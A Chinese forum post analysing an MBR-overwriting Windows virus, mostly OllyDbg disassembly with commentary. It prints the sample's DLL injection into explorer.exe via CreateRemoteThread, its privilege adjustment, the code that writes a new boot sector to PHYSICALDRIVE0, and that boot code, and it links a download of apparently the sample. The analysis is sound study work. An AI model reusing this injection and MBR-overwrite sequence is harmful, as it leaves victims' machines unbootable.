-
-
[原创]小病毒一枚
-
发表于: 2013-7-12 09:43
-
已经有大牛分析了这个病毒
本着学习的目的 分析了一下
原帖转
http://www.52pojie.cn/forum.php?mod=viewthread&tid=204176&page=1&extra=
简介
修改MBR的病毒。
被感染的系统症状
感染该样本后,重启电脑电脑将无法正常启动,只会显示一窜字符串。
文件系统变化
修改MBR,释放txt以及dll
注册表变化
删除HKEN_CURRENT_USER子健Keyboard Layout\Preload 可以修改输入法
网络症状
无
004019B9 |. FF15 D0804000 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
004019BF |. A3 04D14000 mov dword ptr ds:[0x40D104],eax
004019C4 |. E8 8E110000 call OhMyGod.00402B57
004019C9 |. A3 08BB4000 mov dword ptr ds:[0x40BB08],eax
004019CE |. E8 370F0000 call OhMyGod.0040290A
004019D3 |. E8 790E0000 call OhMyGod.00402851
004019D8 |. E8 EE0B0000 call OhMyGod.004025CB
004019DD |. A1 48BB4000 mov eax,dword ptr ds:[0x40BB48]
004019E2 |. A3 4CBB4000 mov dword ptr ds:[0x40BB4C],eax
004019E7 |. 50 push eax
004019E8 |. FF35 40BB4000 push dword ptr ds:[0x40BB40]
004019EE |. FF35 3CBB4000 push dword ptr ds:[0x40BB3C]
004019F4 |. E8 A7FDFFFF call OhMyGod.004017A0 // 这里下断
004019F9 |. 83C4 0C add esp,0xC
004019FC |. 8945 E4 mov [local.7],eax
004019FF |. 50 push eax
00401A00 |. E8 F30B0000 call OhMyGod.004025F8
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
004017AA |. E8 A1F8FFFF call OhMyGod.00401050
004017AF |. E8 5CFDFFFF call OhMyGod.00401510
004017B4 |. E8 C7F8FFFF call OhMyGod.00401080
004017B9 |. E8 92F9FFFF call OhMyGod.00401150
004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
004017C3 |. E8 58F8FFFF call OhMyGod.00401020
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |Title = "111"
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Text = "Good"
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
第一个CALL 004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004016A0 |$ 6A 00 push 0x0 ; /pThreadId = NULL
004016A2 |. 6A 00 push 0x0 ; |CreationFlags = 0
004016A4 |. 6A 00 push 0x0 ; |pThreadParm = NULL
004016A6 |. 68 60154000 push OhMyGod.00401560 ; |ThreadFunction = OhMyGod.00401560
004016AB |. 6A 00 push 0x0 ; |StackSize = 0
004016AD |. 6A 00 push 0x0 ; |pSecurity = NULL
004016AF |. FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread
004016B5 |. 50 push eax ; /hObject
004016B6 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
创建了线程 先去 00401560 . 83EC 0C sub esp,0xC 下断
第二个 CALL 004017A5 |. E8 76FDFFFF call OhMyGod.00401520
00401520 /$ 68 E0904000 push OhMyGod.004090E0 ; /MutexName = "jinguizi"
00401525 |. 6A 00 push 0x0 ; |InitialOwner = FALSE
00401527 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401529 |. FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \CreateMutexA
0040152F |. 85C0 test eax,eax
00401531 |. 74 26 je XOhMyGod.00401559
00401533 |. FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError
00401539 |. 3D B7000000 cmp eax,0xB7
0040153E |. 75 19 jnz XOhMyGod.00401559
00401540 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00401542 |. 6A 00 push 0x0 ; |Title = NULL
00401544 |. 68 CC904000 push OhMyGod.004090CC ; |Text = "只能有一个程序运行"
00401549 |. 6A 00 push 0x0 ; |hOwner = NULL
0040154B |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00401551 |. 6A 00 push 0x0 ; /ExitCode = 0
00401553 |. FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
00401559 \> C3 retn
创建互斥体 检查程序只能一次运行
第三个 CALL 004017AA |. E8 A1F8FFFF call OhMyGod.00401050
00401050 /$ 51 push ecx
00401051 |. 8D4424 00 lea eax,dword ptr ss:[esp]
00401055 |. 50 push eax ; /pHandle
00401056 |. 6A 08 push 0x8 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058 |. 6A 00 push 0x0 ; |Reserved = 0
0040105A |. 68 44904000 push OhMyGod.00409044 ; |Subkey = "Keyboard Layout\Preload"
0040105F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401064 |. FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040106A |. 68 44904000 push OhMyGod.00409044 ; /Subkey = "Keyboard Layout\Preload"
0040106F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401074 |. FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
0040107A |. 59 pop ecx
0040107B \. C3 retn
修改删除注册表 项 HKEY_CURRENT_USER\Keyboard Layout\Preload
完成修改输入法的功能
第四个 CALL 004017AF |. E8 5CFDFFFF call OhMyGod.00401510
隐藏前台窗口
第五个 CALL
写入 金龟子真棒!
C:\WINDOWS\4200460.txt
第六个 CALL
VirtualProtect修改了属性 WriteProcessMemory HOOK 了 MessageBox
第七个 CALL
004016E9 |. 68 80000000 push 0x80 ; /BufSize = 80 (128.)
004016EE |. F3:AB rep stos dword ptr es:[edi] ; |
004016F0 |. 66:AB stos word ptr es:[edi] ; |
004016F2 |. AA stos byte ptr es:[edi] ; |
004016F3 |. 8D4424 14 lea eax,dword ptr ss:[esp+0x14] ; |
004016F7 |. 50 push eax ; |PathBuffer
004016F8 |. 6A 00 push 0x0 ; |hModule = NULL
004016FA |. FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
00401700 |. 8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
00401706 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401708 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040170D |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040170F |. 6A 00 push 0x0 ; |pSecurity = NULL
00401711 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713 |. 8D4C24 24 lea ecx,dword ptr ss:[esp+0x24] ; |
00401717 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040171C |. 51 push ecx ; |FileName
0040171D |. FFD3 call ebx ; \CreateFileA
0040171F |. 8D5424 0C lea edx,dword ptr ss:[esp+0xC]
00401723 |. 8BF0 mov esi,eax
00401725 |. 52 push edx ; /pFileSizeHigh
00401726 |. 56 push esi ; |hFile
00401727 |. FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; \GetFileSize
0040172D |. 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00401731 |. 6A 04 push 0x4 ; /flProtect = 4
00401733 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401738 |. 50 push eax ; |dwSize
00401739 |. 6A 00 push 0x0 ; |lpAddress = NULL
0040173B |. 6A 00 push 0x0 ; |hProcess = NULL
0040173D |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
00401743 |. 8B5424 0C mov edx,dword ptr ss:[esp+0xC]
00401747 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0040174B |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040174D |. 8BF8 mov edi,eax ; |
0040174F |. 51 push ecx ; |pBytesRead
00401750 |. 52 push edx ; |BytesToRead
00401751 |. 57 push edi ; |Buffer
00401752 |. 56 push esi ; |hFile
00401753 |. FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401759 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
0040175B |. 68 80000000 push 0x80 ; |Attributes = NORMAL
00401760 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401762 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401764 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040176B |. 68 F4904000 push OhMyGod.004090F4 ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770 |. FFD3 call ebx ; \CreateFileA
00401772 |. 8B4C24 0C mov ecx,dword ptr ss:[esp+0xC]
00401776 |. 8BD8 mov ebx,eax
00401778 |. 8D4424 0C lea eax,dword ptr ss:[esp+0xC]
0040177C |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040177E |. 50 push eax ; |pBytesWritten
0040177F |. 51 push ecx ; |nBytesToWrite
00401780 |. 57 push edi ; |Buffer
00401781 |. 53 push ebx ; |hFile
00401782 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401788 |. 8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
0040178E |. 53 push ebx ; /hObject
0040178F |. FFD7 call edi ; \CloseHandle
00401791 |. 56 push esi ; /hObject
00401792 |. FFD7 call edi ; \CloseHandle
WriteProcessMemory 写入相同SIZE的内存大小
最后一个 CALL (第八个)
00401020 /$ 8A0D 30904000 mov cl,byte ptr ds:[0x409030]
00401026 |. 56 push esi
00401027 |. 33F6 xor esi,esi
00401029 |. 33D2 xor edx,edx
0040102B |. 84C9 test cl,cl
0040102D |. 74 1C je XOhMyGod.0040104B
0040102F |. B8 30904000 mov eax,OhMyGod.00409030 ; ASCII "Shabisafhlfiakhfdka"
00401034 |> 02CA /add cl,dl
00401036 |. 03D6 |add edx,esi
00401038 |. 46 |inc esi
00401039 |. 8808 |mov byte ptr ds:[eax],cl
0040103B |. 8A8E 30904000 |mov cl,byte ptr ds:[esi+0x409030]
00401041 |. 8D86 30904000 |lea eax,dword ptr ds:[esi+0x409030]
00401047 |. 84C9 |test cl,cl
00401049 |.^ 75 E9 \jnz XOhMyGod.00401034
0040104B |> 5E pop esi
0040104C \. C3 retn
字符串操作后
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |Title = "111"
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Text = "Good"
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>] ; \MessageBoxA 弹框
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
004017E1 |. 6A 00 push 0x0
004017E3 |. 6A 02 push 0x2
004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
004017EA |. 83C4 08 add esp,0x8
004017ED \. C3 retn
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
遍历进程 寻找 注入 explorer.exe 创建远程线程 创建DLL,和
下面的
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 进入
创建 C:\WINDOWS\system32\ld.dll 从资源中读取信息到这个DLL中 再下面就 CreateRemoteThread 注入
00401230 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00401235 |. 57 push edi ; |Buffer
00401236 |. FF15 34804000 call dword ptr ds:[<&KERNEL32.GetSystemDirect>; \GetSystemDirectoryA
0040123C |. 6A 00 push 0x0
0040123E |. E8 E7050000 call OhMyGod.0040182A
00401243 |. 50 push eax
00401244 |. E8 B9050000 call OhMyGod.00401802
00401249 |. E8 BE050000 call OhMyGod.0040180C
0040124E |. 68 0C184000 push OhMyGod.0040180C ; /<%ld> = 40180C (4200460.)
00401253 |. 57 push edi ; |<%s>
00401254 |. 68 9C904000 push OhMyGod.0040909C ; |Format = "%s\%ld.dll"
00401259 |. 56 push esi ; |s
0040125A |. FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
00401260 |. 83C4 18 add esp,0x18
00401263 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401265 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040126A |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
0040126C |. 6A 00 push 0x0 ; |pSecurity = NULL
0040126E |. 6A 02 push 0x2 ; |ShareMode = FILE_SHARE_WRITE
00401270 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
00401275 |. 56 push esi ; |FileName
00401276 |. FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
0040127C |. 68 98904000 push OhMyGod.00409098 ; /ResourceType = "EXE"
00401281 |. 6A 65 push 0x65 ; |ResourceName = 0x65
00401283 |. 6A 00 push 0x0 ; |hModule = NULL
00401285 |. 8BF8 mov edi,eax ; |
00401287 |. FF15 30804000 call dword ptr ds:[<&KERNEL32.FindResourceA>] ; \FindResourceA
0040128D |. 8BD8 mov ebx,eax
0040128F |. 53 push ebx ; /hResource
00401290 |. 6A 00 push 0x0 ; |hModule = NULL
00401292 |. FF15 2C804000 call dword ptr ds:[<&KERNEL32.LoadResource>] ; \LoadResource
00401298 |. 53 push ebx ; /hResource
00401299 |. 6A 00 push 0x0 ; |hModule = NULL
0040129B |. 8BE8 mov ebp,eax ; |
0040129D |. FF15 28804000 call dword ptr ds:[<&KERNEL32.SizeofResource>>; \SizeofResource
004012A3 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
004012A7 |. 6A 00 push 0x0 ; /pOverlapped = NULL
004012A9 |. 51 push ecx ; |pBytesWritten
004012AA |. 50 push eax ; |nBytesToWrite
004012AB |. 55 push ebp ; |Buffer
004012AC |. 57 push edi ; |hFile
004012AD |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
004012B3 |. 57 push edi ; /hObject
004012B4 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
00401337 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0040133B |. 50 |push eax ; /lppe
0040133C |. 55 |push ebp ; |hSnapshot
0040133D |. E8 AE040000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
00401342 |. 85C0 |test eax,eax
00401344 |.^ 75 B7 \jnz XOhMyGod.004012FD
00401346 |. EB 04 jmp XOhMyGod.0040134C
00401348 |> 8B7C24 18 mov edi,dword ptr ss:[esp+0x18]
0040134C |> 57 push edi ; /ProcessId
0040134D |. 6A 00 push 0x0 ; |Inheritable = FALSE
0040134F |. 68 FF0F1F00 push 0x1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401354 |. FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProcess>] ; \OpenProcess
0040135A |. 8BF0 mov esi,eax
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 /////////////////////////////////////////重要的函数
00401361 |. 8BD8 mov ebx,eax
00401363 |. 83C9 FF or ecx,0xFFFFFFFF
00401366 |. 8BFB mov edi,ebx
00401368 |. 33C0 xor eax,eax
0040136A |. F2:AE repne scas byte ptr es:[edi]
0040136C |. F7D1 not ecx
0040136E |. 6A 04 push 0x4 ; /flProtect = 4
00401370 |. 49 dec ecx ; |
00401371 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401376 |. 51 push ecx ; |dwSize
00401377 |. 50 push eax ; |lpAddress => NULL
00401378 |. 56 push esi ; |hProcess
00401379 |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
0040137F |. 8BE8 mov ebp,eax
00401381 |. 8BFB mov edi,ebx
00401383 |. 83C9 FF or ecx,0xFFFFFFFF
00401386 |. 33C0 xor eax,eax
00401388 |. F2:AE repne scas byte ptr es:[edi]
0040138A |. F7D1 not ecx
0040138C |. 49 dec ecx
0040138D |. 6A 00 push 0x0 ; /pBytesWritten = NULL
0040138F |. 51 push ecx ; |BytesToWrite
00401390 |. 53 push ebx ; |Buffer
00401391 |. 55 push ebp ; |Address
00401392 |. 56 push esi ; |hProcess
00401393 |. FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProcessMemory>] ; \WriteProcessMemory
00401399 |. 8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; kernel32.LoadLibraryA
0040139F |. 6A 00 push 0x0 ; /lpThreadId = NULL
004013A1 |. 6A 00 push 0x0 ; |dwCreationFlags = 0
004013A3 |. 55 push ebp ; |lpParameter
004013A4 |. 51 push ecx ; |lpStartAddress => kernel32.LoadLibraryA
004013A5 |. 6A 00 push 0x0 ; |dwStackSize = 0
004013A7 |. 6A 00 push 0x0 ; |lpThreadAttributes
004013A9 |. 56 push esi ; |hProcess
004013AA |. FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemoteThread>] ; \CreateRemoteThread
004013B0 |. 8BF8 mov edi,eax
004013B2 |. 6A FF push -0x1 ; /Timeout = INFINITE
004013B4 |. 57 push edi ; |hObject
004013B5 |. FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSingleObject>] ; \WaitForSingleObject
004013BB |. 68 00800000 push 0x8000 ; /dwFreeType = 8000 (32768.)
004013C0 |. 6A 00 push 0x0 ; |dwSize = 0
004013C2 |. 55 push ebp ; |lpAddress
004013C3 |. 56 push esi ; |hProcess
004013C4 |. FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFreeEx>] ; \VirtualFreeEx
004013CA |. 56 push esi ; /hObject
004013CB |. 8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; |kernel32.CloseHandle
004013D1 |. FFD6 call esi ; \CloseHandle
004013D3 |. 57 push edi ; /hObject
004013D4 |. FFD6 call esi ; \CloseHandle
004013D6 |. 5F pop edi
004013D7 |. 5E pop esi
004013D8 |. 5D pop ebp
004013D9 |. 5B pop ebx
004013DA |. 81C4 28010000 add esp,0x128
004013E0 \. C3 retn
继续往下 可以看到提升权限的函数
004014C1 |> \57 push edi
004014C2 |. B9 24000000 mov ecx,0x24
004014C7 |. 33C0 xor eax,eax
004014C9 |. 8D7C24 08 lea edi,dword ptr ss:[esp+0x8]
004014CD |. F3:AB rep stos dword ptr es:[edi]
004014CF |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
004014D3 |. C74424 04 940>mov dword ptr ss:[esp+0x4],0x94
004014DB |. 50 push eax ; /pVersionInformation
004014DC |. FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersionExA>] ; \GetVersionExA
004014E2 |. 85C0 test eax,eax
004014E4 |. 5F pop edi
004014E5 |. 75 07 jnz XOhMyGod.004014EE
004014E7 |. 81C4 94000000 add esp,0x94
004014ED |. C3 retn
004014EE |> 837C24 10 02 cmp dword ptr ss:[esp+0x10],0x2
004014F3 |. 75 05 jnz XOhMyGod.004014FA
004014F5 |. E8 F6FEFFFF call OhMyGod.004013F0 //这个为提升权限的函数
004013F0 /$ 83EC 14 sub esp,0x14
004013F3 |. 33C0 xor eax,eax
004013F5 |. 8D4C24 00 lea ecx,dword ptr ss:[esp]
004013F9 |. 894424 08 mov dword ptr ss:[esp+0x8],eax
004013FD |. 51 push ecx ; /phToken
004013FE |. 894424 10 mov dword ptr ss:[esp+0x10],eax ; |
00401402 |. 6A 28 push 0x28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00401404 |. C74424 08 000>mov dword ptr ss:[esp+0x8],0x0 ; |
0040140C |. C74424 0C 000>mov dword ptr ss:[esp+0xC],0x0 ; |
00401414 |. 894424 18 mov dword ptr ss:[esp+0x18],eax ; |
00401418 |. FF15 AC804000 call dword ptr ds:[<&KERNEL32.GetCurrentProcess>] ; |[GetCurrentProcess
0040141E |. 50 push eax ; |hProcess
0040141F |. FF15 10804000 call dword ptr ds:[<&ADVAPI32.OpenProcessToken>] ; \OpenProcessToken
00401425 |. 85C0 test eax,eax
00401427 |. 75 04 jnz XOhMyGod.0040142D
00401429 |. 83C4 14 add esp,0x14
0040142C |. C3 retn
0040142D |> 8D5424 08 lea edx,dword ptr ss:[esp+0x8]
00401431 |. 52 push edx ; /pLocalId
00401432 |. 68 B8904000 push OhMyGod.004090B8 ; |Privilege = "SeShutdownPrivilege"
00401437 |. 6A 00 push 0x0 ; |SystemName = NULL
00401439 |. FF15 14804000 call dword ptr ds:[<&ADVAPI32.LookupPrivilegeValueA>; \LookupPrivilegeValueA
0040143F |. 85C0 test eax,eax
00401441 |. 75 11 jnz XOhMyGod.00401454
00401443 |. 8B4424 00 mov eax,dword ptr ss:[esp]
00401447 |. 50 push eax ; /hObject
00401448 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040144E |. 33C0 xor eax,eax
00401450 |. 83C4 14 add esp,0x14
00401453 |. C3 retn
00401454 |> 8B5424 00 mov edx,dword ptr ss:[esp]
00401458 |. 6A 00 push 0x0 ; /pRetLen = NULL
0040145A |. 6A 00 push 0x0 ; |pPrevState = NULL
0040145C |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] ; |
00401460 |. 6A 10 push 0x10 ; |PrevStateSize = 10 (16.)
00401462 |. 51 push ecx ; |pNewState
00401463 |. 6A 00 push 0x0 ; |DisableAllPrivileges = FALSE
00401465 |. 52 push edx ; |hToken
00401466 |. C74424 1C 010>mov dword ptr ss:[esp+0x1C],0x1 ; |
0040146E |. C74424 28 020>mov dword ptr ss:[esp+0x28],0x2 ; |
00401476 |. FF15 18804000 call dword ptr ds:[<&ADVAPI32.AdjustTokenPrivileges>; \AdjustTokenPrivileges
0040147C |. 85C0 test eax,eax
0040147E |. 75 11 jnz XOhMyGod.00401491
00401480 |. 8B4424 00 mov eax,dword ptr ss:[esp]
00401484 |. 50 push eax ; /hObject
00401485 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040148B |. 33C0 xor eax,eax
0040148D |. 83C4 14 add esp,0x14
00401490 |. C3 retn
现在分析 新线程 先去 00401560 . 83EC 0C sub esp,0xC
寻找"ClipSrv"相同名字的服务
00401560 . 83EC 0C sub esp,0xC
00401563 . 53 push ebx
00401564 . 55 push ebp
00401565 . 56 push esi
00401566 . 57 push edi
00401567 . E8 E4FAFFFF call OhMyGod.00401050
0040156C . 33DB xor ebx,ebx
0040156E . 68 3F000F00 push 0xF003F
00401573 . 53 push ebx
00401574 . 53 push ebx
00401575 . FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCManagerA>] ; ADVAPI32.OpenSCManagerA //打开SCM 是服务相关的函数
0040157B . 8BE8 mov ebp,eax
0040157D . 3BEB cmp ebp,ebx
0040157F . 75 0C jnz XOhMyGod.0040158D
00401581 . 5F pop edi
00401582 . 5E pop esi
00401583 . 5D pop ebp
00401584 . 33C0 xor eax,eax
00401586 . 5B pop ebx
00401587 . 83C4 0C add esp,0xC
0040158A . C2 0400 retn 0x4
0040158D > 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
00401591 . 8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumServicesStatus>; ADVAPI32.EnumServicesStatusA
00401597 . 53 push ebx ; /pResumeHandle
00401598 . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] ; |
0040159C . 50 push eax ; |pCount
0040159D . 51 push ecx ; |pBytesNeeded
0040159E . 53 push ebx ; |BufSize
0040159F . 53 push ebx ; |pEnumStatus
004015A0 . 6A 03 push 0x3 ; |ServiceState = 3
004015A2 . 6A 3B push 0x3B ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4 . 55 push ebp ; |hManager
004015A5 . 895C24 34 mov dword ptr ss:[esp+0x34],ebx ; |
004015A9 . 895C24 30 mov dword ptr ss:[esp+0x30],ebx ; |
004015AD . FFD7 call edi ; \EnumServicesStatusA //枚举当前系统服务。
004015AF . 8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015B3 . 52 push edx ; /Size
004015B4 . 6A 40 push 0x40 ; |Flags = LPTR
004015B6 . FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>] ; \LocalAlloc //这个函数从堆中分配指定大小的字节数。
004015BC . 8BF0 mov esi,eax
004015BE . 3BF3 cmp esi,ebx
004015C0 . 75 13 jnz XOhMyGod.004015D5
004015C2 . 55 push ebp
004015C3 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServiceHandle>] ; ADVAPI32.CloseServiceHandle
004015C9 . 5F pop edi
004015CA . 5E pop esi
004015CB . 5D pop ebp
004015CC . 33C0 xor eax,eax
004015CE . 5B pop ebx
004015CF . 83C4 0C add esp,0xC
004015D2 . C2 0400 retn 0x4
004015D5 > \8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015D9 . 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
004015DD . 53 push ebx
004015DE . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14]
004015E2 . 50 push eax
004015E3 . 51 push ecx
004015E4 . 52 push edx
004015E5 . 56 push esi
004015E6 . 6A 03 push 0x3
004015E8 . 6A 30 push 0x30
004015EA . 55 push ebp
004015EB . FFD7 call edi ; ADVAPI32.EnumServicesStatusA
004015ED . 85C0 test eax,eax
004015EF . 75 20 jnz XOhMyGod.00401611
004015F1 . 395C24 10 cmp dword ptr ss:[esp+0x10],ebx
004015F5 . 75 1A jnz XOhMyGod.00401611
004015F7 . 55 push ebp
004015F8 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServiceHandle>] ; ADVAPI32.CloseServiceHandle
004015FE . 56 push esi ; /hMemory
004015FF . FF15 6C804000 call dword ptr ds:[<&KERNEL32.LocalFree>] ; \LocalFree
00401605 . 5F pop edi
00401606 . 5E pop esi
00401607 . 5D pop ebp
00401608 . 33C0 xor eax,eax
0040160A . 5B pop ebx
0040160B . 83C4 0C add esp,0xC
0040160E . C2 0400 retn 0x4
////////////////////////////////////////////////////////////////////////////////////////////////////////////
下面分析DLL
资源中内存地址为40E060
转换为文件地址
40E060-400000-2000 = c060
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
大小:0x00036041
载入知道是写MBR
开机重启显示 hacked by JinGuiZi
用WinHex把MBR拷贝出来 拖进IDA 然后设置 Loading segment 为 0x7c00
利用快捷键A和C调整代码,调整后下图,核心功能就是利用int 10h中断显示字符串
seg000:7C00 seg000 segment byte public 'CODE' use16
seg000:7C00 assume cs:seg000
seg000:7C00 ;org 7C00h
seg000:7C00 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 mov ax, 12h ; 设置显示器模式,12H:640×480 16色
seg000:7C03 int 10h ; - VIDEO - SET VIDEO MODE
seg000:7C03 ; AL = mode
seg000:7C05 mov bp, 7C18h ; es:bp字符串的地址
seg000:7C08 mov cx, 13h ; 显示字符串长度为0x13
seg000:7C0B mov ax, 1301h ; ah = 13h,al = 01h 表示执行int10中断的13号程序功能(在Teletype模式下显示字符串)
seg000:7C0E mov bx, 0Ch ; bl=0Ch,表示属性,背景色为黑色,字体颜色为淡红色
seg000:7C11 mov dx, 0 ; dh = 0;表示第0列第0行
seg000:7C14 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14 ; ES:BP -> start of string
seg000:7C14 ; ---------------------------------------------------------------------------
seg000:7C16 db 0E2h
seg000:7C17 db 0FEh ;
seg000:7C18 db 'h'
seg000:7C19 db 61h ; a
seg000:7C1A db 63h ; c
seg000:7C1B db 'k'
seg000:7C1C db 65h ; e
seg000:7C1D db 64h ; d
seg000:7C1E db 20h
seg000:7C1F db 'b'
seg000:7C20 db 79h ; y
seg000:7C21 db 20h
seg000:7C22 db 'J'
seg000:7C23 db 'i'
seg000:7C24 db 6Eh ; n
seg000:7C25 db 47h ; G
seg000:7C26 db 75h ; u
seg000:7C27 db 69h ; i
seg000:7C28 db 'Z'
seg000:7C29 db 'i'
seg000:7C2A db 20h
seg000:7C2B db 20h
seg000:7C2C db 20h
seg000:7C2D db 20h
seg000:7C2E db 20h
seg000:7C2F db 20h
seg000:7C2F seg000 ends
下载地址: 3.rar
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
